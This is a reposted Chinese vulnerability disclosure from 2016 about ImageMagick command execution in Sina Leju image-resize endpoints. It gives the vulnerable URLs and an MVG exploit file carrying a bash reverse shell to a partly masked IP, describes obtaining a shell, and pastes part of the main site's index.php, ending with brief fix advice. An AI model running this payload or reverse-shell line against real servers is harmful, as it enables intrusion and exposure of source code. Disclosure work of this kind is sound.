频道栏目
首页 > 安全 > 企业安全 > 正文

新浪乐居某服务器的两处命令执行可shell

2016-06-23 09:07:52           
收藏   我要投稿

新浪乐居某服务器的两处命令执行,可影响乐居多个重要站点,包括主站

存在漏洞的连接为:

http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://img2.3lian.com/img2007/19/33/005.jpg

这是一个把远程图片剪切大小的连接,存在ImageMagick 命令执行漏洞



把远程的url地址换成自己服务器的图片,访问:

http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://101.200.**.**/out.jpg&dpc=1
 

QQ截图20160508162516.jpg





修改out.jpg
 

push graphic-context
viewbox 0 0 640 480
fill 'url(https://"|bash -i >& /dev/tcp/101.200.**.**/8081 0>&1;")'
pop graphic-contextop graphic-context





然后再访问http://supports.house.sina.com.cn/bbs/img.php?w=140&h=105&m=1&url=http://101.200.**.**/out.jpg&dpc=1

反弹一个shell回来了
 

QQ截图20160508162851.jpg


 

这个服务器简单看了下,是乐居一个重要的服务器,放了乐居的各种网站都在上面
 

QQ截图20160508170027.jpg



这些网站的源代码全部可读,其中乐居主站目录为:/data1/vhosts/www.leju.com/htdocs



view-source:index.php
 

header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); // Date in the past
require_once $_SERVER['DOCUMENT_ROOT'].'/framework/include/function.php';
$limittime = 1451376000;//29号下午4点上线
if(time() > $limittime)
{
    require_once $_SERVER['DOCUMENT_ROOT'].'/framework/include/expand.fun.php';
}

//域名跳转
if ( $_SERVER['HTTP_HOST'] == 'eju.com' || $_SERVER['HTTP_HOST'] == 'esalse.leju.com' )
{
    header("Location:http://www.eju.com/{$_SERVER['REQUEST_URI']}");
    die;
}
$source_arr = array();
$sourcestr = '';
isset($_GET['source']) ? array_push($source_arr, 'source='.$_GET['source']) : '';
isset($_GET['source_ext']) ? array_push($source_arr, 'source_ext='.$_GET['source_ext']) : '';
if(!empty($source_arr))
{
    $sourcestr = implode('&', $source_arr);
}
//跳转到leju.com的域名
if ( $_SERVER['HTTP_HOST'] == 'leju.cn' || $_SERVER['HTTP_HOST'] == 'www.leju.cn' || $_SERVER['HTTP_HOST'] == 'ileju.cn' ||$_SERVER['HTTP_HOST'] == 'www.ileju.cn' ||$_SERVER['HTTP_HOST'] == 'www.ileju.com' ||$_SERVER['HTTP_HOST'] == 'ileju.com')
{
    if(!empty($sourcestr))
    {   
        header("Location:http://www.leju.com?".$sourcestr);
    }
    else
    {
        header("Location:http://www.leju.com");
    }
    die;
}

//参数转义处理
$_POST = daddslashes($_POST);
$_GET  = daddslashes($_GET);
$_COOKIE  = daddslashes($_COOKIE);
$_REQUEST  = daddslashes($_REQUEST);


//解决XSS漏洞
$_p = array();
$_g = array();
$_c = array();
$array = array('<','>');
$array_c = array("user()", "sleep(", "length(", "insert", "select",'<','>',"'","(",")");
$pgc = array("\\",'<','>','





另外的一处命令执行为

http://supports.jiaju.sina.com.cn/api/img_publish.php?dpc=1&w=96&h=96&m=0&s=http://101.200.**.**/out.jpg 类似的就不重复提交了。


 

解决方案:

1 修复ImageMagick漏洞

2 那两个连接还存在SSRF一起修复下吧。

上一篇:ChinaCache某系统补丁不及时导致getshell可威胁内网
下一篇:暴雪再躺枪,惨遭黑客狂打脸
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站